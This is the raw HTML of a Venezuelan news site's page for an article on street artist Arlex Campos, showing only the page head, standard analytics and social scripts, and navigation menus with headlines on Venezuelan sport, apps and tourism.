<!doctype html >
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->
<!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en"> <![endif]-->
<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="no-js ie9 oldie" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="es-ES" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head>
    
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="author" content="Katiusa Casanova">
    <link rel="pingback" href="http://www.noticias.com.ve/xmlrpc.php" />

    <meta property="og:image" content="http://www.noticias.com.ve/wp-content/uploads/2017/08/Preview_Tendencia_87_Arlex_Campos.jpg" />	

<!-- This site is optimized with the Yoast SEO plugin v3.5 - https://yoast.com/wordpress/plugins/seo/ -->
<title>Arlex Campos: Street Art con sello venezolano - Noticias.com.ve</title>
<meta name="description" content="Los artistas del cinetismo venezolano Jesús Soto y Carlos Cruz Diez han sido inspiración en el Street Art de este tachirense"/>
<meta name="robots" content="noodp"/>
<link rel="canonical" href="http://www.noticias.com.ve/arlex-campos/" />
<meta property="og:locale" content="es_ES" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Arlex Campos: Street Art con sello venezolano - Noticias.com.ve" />
<meta property="og:description" content="Los artistas del cinetismo venezolano Jesús Soto y Carlos Cruz Diez han sido inspiración en el Street Art de este tachirense" />
<meta property="og:url" content="http://www.noticias.com.ve/arlex-campos/" />
<meta property="og:site_name" content="Noticias.com.ve" />
<meta property="article:tag" content="Arlex Campos" />
<meta property="article:section" content="Ingenio Venezolano" />
<meta property="article:published_time" content="2017-08-14T16:58:03+00:00" />
<meta property="article:modified_time" content="2017-08-14T17:13:13+00:00" />
<meta property="og:updated_time" content="2017-08-14T17:13:13+00:00" />
<meta property="og:image" content="http://www.noticias.com.ve/wp-content/uploads/2017/08/Preview_Tendencia_87_Arlex_Campos.jpg" />
<meta property="og:image:width" content="1200" />
<meta property="og:image:height" content="628" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Los artistas del cinetismo venezolano Jesús Soto y Carlos Cruz Diez han sido inspiración en el Street Art de este tachirense" />
<meta name="twitter:title" content="Arlex Campos: Street Art con sello venezolano - Noticias.com.ve" />
<meta name="twitter:image" content="http://www.noticias.com.ve/wp-content/uploads/2017/08/Preview_Tendencia_87_Arlex_Campos.jpg" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Noticias.com.ve &raquo; Feed" href="http://www.noticias.com.ve/feed/" />
<link rel="alternate" type="application/rss+xml" title="Noticias.com.ve &raquo; RSS de los comentarios" href="http://www.noticias.com.ve/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.noticias.com.ve\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.5"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='contact-form-7-css'  href='http://www.noticias.com.ve/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.5' type='text/css' media='all' />
<link rel='stylesheet' id='weblator_polling-plugin-styles-css'  href='http://www.noticias.com.ve/wp-content/plugins/weblator-polling/public/assets/css/public.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='weblator_polling-fa-css'  href='http://www.noticias.com.ve/wp-content/plugins/weblator-polling/public/assets/css/font-awesome.min.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-opensans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%2Clatin-ext%2Ccyrillic&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-ubuntu-css'  href='http://fonts.googleapis.com/css?family=Ubuntu%3A300%2C400%2C500%2C700%2C300italic%2C400italic%2C500italic%2C700italic&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Clatin-ext%2Ccyrillic&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-pt-sans-css'  href='http://fonts.googleapis.com/css?family=PT+Sans%3A400%2C700%2C400italic&#038;subset=latin%2Ccyrillic-ext%2Clatin-ext%2Ccyrillic&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-oswald-css'  href='http://fonts.googleapis.com/css?family=Oswald%3A400%2C300%2C700&#038;subset=latin%2Clatin-ext&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='google-roboto-cond-css'  href='http://fonts.googleapis.com/css?family=Roboto+Condensed%3A300italic%2C400italic%2C700italic%2C400%2C300%2C700&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%2Clatin-ext%2Ccyrillic&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='google-vollkorn-css'  href='http://fonts.googleapis.com/css?family=Vollkorn%3A400italic%2C700italic%2C400%2C700&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='td-bootstrap-css'  href='http://www.noticias.com.ve/wp-content/themes/Newspaper/includes/wp_booster/external/bootstrap/td-bootstrap.css?ver=4.6.3' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://www.noticias.com.ve/wp-content/themes/Newspaper/style.css?ver=4.6.3' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://www.noticias.com.ve/wp-content/plugins/jetpack/css/jetpack.css?ver=4.3.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.noticias.com.ve/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.noticias.com.ve/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://www.noticias.com.ve/wp-content/plugins/weblator-polling/public/assets/js/vendors/excanvas.js?ver=1.3.0'></script>
<script type='text/javascript' src='http://www.noticias.com.ve/wp-content/plugins/weblator-polling/public/assets/js/vendors/Chart.min.js?ver=1.3.0'></script>
<script type='text/javascript' src='http://www.noticias.com.ve/wp-content/plugins/weblator-polling/public/assets/js/app/legend.js?ver=1.3.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var ajaxurl = "http:\/\/www.noticias.com.ve\/wp-admin\/admin-ajax.php";
/* ]]> */
</script>
<script type='text/javascript' src='http://www.noticias.com.ve/wp-content/plugins/weblator-polling/public/assets/js/app/public.js?ver=1.3.0'></script>
<link rel='https://api.w.org/' href='http://www.noticias.com.ve/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.noticias.com.ve/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.noticias.com.ve/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.7.5" />
<link rel='shortlink' href='http://www.noticias.com.ve/?p=10220' />
<link rel="alternate" type="application/json+oembed" href="http://www.noticias.com.ve/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.noticias.com.ve%2Farlex-campos%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.noticias.com.ve/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.noticias.com.ve%2Farlex-campos%2F&#038;format=xml" />
  
  <div id="fb-root"></div>
  
	<script>(function(d, s, id) {
  		var js, fjs = d.getElementsByTagName(s)[0];
  		if (d.getElementById(id)) return;
  		js = d.createElement(s); js.id = id;
  		js.src = "//connect.facebook.net/es_ES/sdk.js#xfbml=1&appId=150278208448155&version=v2.0";
  		fjs.parentNode.insertBefore(js, fjs);
	}(document, 'script', 'facebook-jssdk'));</script>
    
    <style>
	#fbcomments, .fb-comments, .fb-comments iframe[style], .fb-comments span {
		width: 100% !important;
	}
	</style>

<link rel='dns-prefetch' href='//v0.wordpress.com'>
<style type='text/css'>img#wpstats{display:none}</style><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <!-- All in one Favicon 4.3 --><link rel="shortcut icon" href="http://www.noticias.com.ve/wp-content/uploads/2015/12/noticias1.ico" />
<meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if IE 8]><link rel="stylesheet" type="text/css" href="http://www.noticias.com.ve/wp-content/plugins/js_composer/assets/css/vc-ie8.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    

var td_blocks = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function td_block() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_cur_cat = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.is_ajax_running = false;
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
var td_ad_background_click_link="";
var td_ad_background_click_target="";
var td_ajax_url="http://www.noticias.com.ve/wp-admin/admin-ajax.php";
var td_get_template_directory_uri="http://www.noticias.com.ve/wp-content/themes/Newspaper";
var tds_snap_menu="";
var tds_header_style="";
var tds_mobile_swipe="";
var td_search_url="http://www.noticias.com.ve/search/";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top="0";
var tds_theme_color_site_wide="#4db2ec";
</script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-64547758-1', 'auto');
  ga('send', 'pageview');

</script><noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>

<body class="post-template-default single single-post postid-10220 single-format-standard td-full-layout arlex-campos wpb-js-composer js-comp-ver-4.4.4 vc_responsive">



<div id="outer-wrap">
    <div id="td-mobile-nav" class="td-transition-content-and-menu">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">CERRAR</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-td-header-container"><ul id="menu-td-header" class=""><li id="menu-item-253" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first menu-item-253"><a href="http://www.noticias.com.ve/">Inicio</a></li>
<li id="menu-item-232" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-232"><a href="http://www.noticias.com.ve/deportes/">Deportes</a></li>
<li id="menu-item-350" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-350"><a href="http://www.noticias.com.ve/tecnologia/">Tecnología</a></li>
<li id="menu-item-354" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-354"><a href="http://www.noticias.com.ve/turismo/">Turismo</a></li>
<li id="menu-item-334" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-334"><a href="http://www.noticias.com.ve/salud/">Salud</a></li>
<li id="menu-item-323" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-323"><a href="http://www.noticias.com.ve/musica/">Música</a></li>
<li id="menu-item-343" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-343"><a href="http://www.noticias.com.ve/recetas/">Recetas</a></li>
<li id="menu-item-330" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-330"><a href="http://www.noticias.com.ve/cine/">Cine</a></li>
<li id="menu-item-339" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-339"><a href="http://www.noticias.com.ve/internacionales/">Internacionales</a></li>
<li id="menu-item-248" class="menu-item menu-item-type-post_type menu-item-object-page td-no-down-arrow menu-item-248"><a href="http://www.noticias.com.ve/contactanos/"><span class="menu_icon td-sp td-sp-ico-contact"></span><span class="menu_hidden">Contact</span></a></li>
</ul></div>    </div>
</div>    <div id="inner-wrap" class="td-transition-content-and-menu">

<!-- graphic logo and ad -->
<div class="td-header-bg">
    <div class="container td-logo-rec-wrap">
        <div class="row">
            <div class="span4 header-logo-wrap" role="banner" itemscope="itemscope" itemtype="http://schema.org/Organization">
                                        <a itemprop="url" href="http://www.noticias.com.ve"><img width="300" src="http://www.noticias.com.ve/wp-content/uploads/2015/11/LOGO-NOTICIAS-300x140.jpg" alt=""/></a>
                        <meta itemprop="name" content="Noticias.com.ve">
                                    </div>
	    <div class="home-seccion-align-vertical">
		<div class="home-seccion-align-vertical-hijo">
            	    <div class="span8 td-header-style-1">
                	            	    </div>
		</div>
	   </div>
        </div>
    </div>
</div><!-- header menu -->

<div class="td-menu-placeholder">

    <div class="td-menu-background">
        <div class="container td-menu-wrap">



            <div class="row-fluid td-menu-header">

                <div class="span11">
                                            <div class="mobile-logo-wrap">
                                                                    <a itemprop="url" href="http://www.noticias.com.ve"><img width="300"  src="http://www.noticias.com.ve/wp-content/uploads/2015/11/LOGO-NOTICIAS-300x140.jpg" alt=""/></a>
                                        <meta itemprop="name" content="Noticias.com.ve">
                                                            </div>
                    

                    <div id="td-top-mobile-toggle">
                        <ul class="sf-menu">
                            <li>
                                <a href="#">
                                    <span class="menu_icon td-sp td-sp-ico-menu"></span>
                                </a>
                            </li>
                        </ul>
                    </div>

                    <div id="td-top-menu" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">

                            <div class="menu-td-header-container"><ul id="menu-td-header-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-253"><a href="http://www.noticias.com.ve/">Inicio</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-mega-menu menu-item-232"><a href="http://www.noticias.com.ve/deportes/">Deportes</a>
<ul class="sub-menu">
	<li id="menu-item-0" class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_1_59923569c7eb1 = new td_block();
block_td_uid_1_59923569c7eb1.id = "td_uid_1_59923569c7eb1";
block_td_uid_1_59923569c7eb1.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"6","show_child_cat":"5"}';
block_td_uid_1_59923569c7eb1.td_cur_cat = "6";
block_td_uid_1_59923569c7eb1.td_column_number = "1";
block_td_uid_1_59923569c7eb1.block_type = "td_mega_menu";
block_td_uid_1_59923569c7eb1.post_count = "5";
block_td_uid_1_59923569c7eb1.found_posts = "361";
block_td_uid_1_59923569c7eb1.max_num_pages = "73";
block_td_uid_1_59923569c7eb1.header_color = "";
block_td_uid_1_59923569c7eb1.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_1_59923569c7eb1);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_1_59923569c7eb1 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/caracas-fc-solo-necesito-tiempo/" rel="bookmark" title="El Caracas FC solo necesitó un tiempo"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/Tiempo-198x143.jpg" alt="tiempo 1" title="El Caracas FC solo necesitó un tiempo"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/caracas-fc-solo-necesito-tiempo/" rel="bookmark" title="El Caracas FC solo necesitó un tiempo">El Caracas FC solo necesitó un tiempo</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/mariana-duran-objetivo-cupo-mundial/" rel="bookmark" title="Mariana Durán: “El objetivo es lograr el cupo al mundial”"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/Durán-198x143.jpg" alt="" title="Mariana Durán: “El objetivo es lograr el cupo al mundial”"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/mariana-duran-objetivo-cupo-mundial/" rel="bookmark" title="Mariana Durán: “El objetivo es lograr el cupo al mundial”">Mariana Durán: “El objetivo es lograr el cupo al mundial”</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/guerreras-entrenan-buenos-aires-1/" rel="bookmark" title="Las Guerreras del baloncesto ya entrenan en Buenos Aires"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/Buenos-198x143.jpg" alt="Buenos" title="Las Guerreras del baloncesto ya entrenan en Buenos Aires"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/guerreras-entrenan-buenos-aires-1/" rel="bookmark" title="Las Guerreras del baloncesto ya entrenan en Buenos Aires">Las Guerreras del baloncesto ya entrenan en Buenos Aires</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/carlos-coste-recibio-guinness-apnea/" rel="bookmark" title="Carlos Coste recibió certificación de su récord Guinness de apnea"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/Coste-198x143.jpg" alt="Coste" title="Carlos Coste recibió certificación de su récord Guinness de apnea"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/carlos-coste-recibio-guinness-apnea/" rel="bookmark" title="Carlos Coste recibió certificación de su récord Guinness de apnea">Carlos Coste recibió certificación de su récord Guinness de apnea</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/dvo-guaira-logro-victoria-clausura/" rel="bookmark" title="Deportivo La Guaira logró su primera victoria del Clausura"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/Logró-198x143.jpg" alt="Logró" title="Deportivo La Guaira logró su primera victoria del Clausura"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/dvo-guaira-logro-victoria-clausura/" rel="bookmark" title="Deportivo La Guaira logró su primera victoria del Clausura">Deportivo La Guaira logró su primera victoria del Clausura</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_59923569c7eb1" data-td_block_id="td_uid_1_59923569c7eb1"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_59923569c7eb1" data-td_block_id="td_uid_1_59923569c7eb1"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-mega-menu menu-item-350"><a href="http://www.noticias.com.ve/tecnologia/">Tecnología</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_3_59923569cf47c = new td_block();
block_td_uid_3_59923569cf47c.id = "td_uid_3_59923569cf47c";
block_td_uid_3_59923569cf47c.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"7","show_child_cat":"5"}';
block_td_uid_3_59923569cf47c.td_cur_cat = "7";
block_td_uid_3_59923569cf47c.td_column_number = "1";
block_td_uid_3_59923569cf47c.block_type = "td_mega_menu";
block_td_uid_3_59923569cf47c.post_count = "5";
block_td_uid_3_59923569cf47c.found_posts = "189";
block_td_uid_3_59923569cf47c.max_num_pages = "38";
block_td_uid_3_59923569cf47c.header_color = "";
block_td_uid_3_59923569cf47c.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_3_59923569cf47c);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_3_59923569cf47c class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/bichos-un-app-venezolana-disenada-diagnosticar-picaduras/" rel="bookmark" title="Bichos: Un app venezolana diseñada diagnosticar picaduras"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/04/am_79215_3710121_314130-198x143.jpg" alt="" title="Bichos: Un app venezolana diseñada diagnosticar picaduras"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/bichos-un-app-venezolana-disenada-diagnosticar-picaduras/" rel="bookmark" title="Bichos: Un app venezolana diseñada diagnosticar picaduras">Bichos: Un app venezolana diseñada diagnosticar picaduras</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/apetoi-una-app-servicios-venezuela/" rel="bookmark" title="Apetoi, una app de servicios en Venezuela"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/04/12096494_421895538000715_5512907856409316674_n-198x143.jpg" alt="" title="Apetoi, una app de servicios en Venezuela"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/apetoi-una-app-servicios-venezuela/" rel="bookmark" title="Apetoi, una app de servicios en Venezuela">Apetoi, una app de servicios en Venezuela</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/casas-inteligentes/" rel="bookmark" title="Casas Inteligentes: Todo lo que puedes tener"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/03/domótica-198x143.jpg" alt="Casas Inteligentes" title="Casas Inteligentes: Todo lo que puedes tener"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/casas-inteligentes/" rel="bookmark" title="Casas Inteligentes: Todo lo que puedes tener">Casas Inteligentes: Todo lo que puedes tener</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/pase-fit-un-app-venezolana-para-entrenar-en-caracas/" rel="bookmark" title="Pase.Fit: Un app venezolana para entrenar en Caracas"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/03/pase.fit_s-198x143.jpg" alt="Pase.Fit" title="Pase.Fit: Un app venezolana para entrenar en Caracas"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/pase-fit-un-app-venezolana-para-entrenar-en-caracas/" rel="bookmark" title="Pase.Fit: Un app venezolana para entrenar en Caracas">Pase.Fit: Un app venezolana para entrenar en Caracas</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/ha-pasado-la-mision-la-luna-spacex-moon/" rel="bookmark" title="¿Qué se sabe del viaje turístico a la luna SpaceX Moon?"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/03/space_X-198x143.jpg" alt="SpaceX Moon" title="¿Qué se sabe del viaje turístico a la luna SpaceX Moon?"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/ha-pasado-la-mision-la-luna-spacex-moon/" rel="bookmark" title="¿Qué se sabe del viaje turístico a la luna SpaceX Moon?">¿Qué se sabe del viaje turístico a la luna SpaceX Moon?</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_59923569cf47c" data-td_block_id="td_uid_3_59923569cf47c"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_3_59923569cf47c" data-td_block_id="td_uid_3_59923569cf47c"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-mega-menu menu-item-354"><a href="http://www.noticias.com.ve/turismo/">Turismo</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_5_59923569d65f0 = new td_block();
block_td_uid_5_59923569d65f0.id = "td_uid_5_59923569d65f0";
block_td_uid_5_59923569d65f0.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"8","show_child_cat":"5"}';
block_td_uid_5_59923569d65f0.td_cur_cat = "8";
block_td_uid_5_59923569d65f0.td_column_number = "1";
block_td_uid_5_59923569d65f0.block_type = "td_mega_menu";
block_td_uid_5_59923569d65f0.post_count = "5";
block_td_uid_5_59923569d65f0.found_posts = "119";
block_td_uid_5_59923569d65f0.max_num_pages = "24";
block_td_uid_5_59923569d65f0.header_color = "";
block_td_uid_5_59923569d65f0.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_5_59923569d65f0);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_5_59923569d65f0 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/el-avila-tres-generaciones-cortometraje/" rel="bookmark" title="El Ávila Tres Generaciones: un cortometraje desde lo alto"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/el_avila_3generaciones-198x143.jpg" alt="El Ávila Tres Generaciones" title="El Ávila Tres Generaciones: un cortometraje desde lo alto"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/el-avila-tres-generaciones-cortometraje/" rel="bookmark" title="El Ávila Tres Generaciones: un cortometraje desde lo alto">El Ávila Tres Generaciones: un cortometraje desde lo alto</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/cafe-venezuela/" rel="bookmark" title="Café Venezuela: Una experiencia para vivir en Caracas"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/cafe-caracas-28235431edit-198x143.jpg" alt="" title="Café Venezuela: Una experiencia para vivir en Caracas"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/cafe-venezuela/" rel="bookmark" title="Café Venezuela: Una experiencia para vivir en Caracas">Café Venezuela: Una experiencia para vivir en Caracas</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/rio-masparro-en-barinas/" rel="bookmark" title="¿Conoces el Río Masparro en Barinas?"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/represa-198x143.jpg" alt="" title="¿Conoces el Río Masparro en Barinas?"/></a></div>            <div class="item-details">
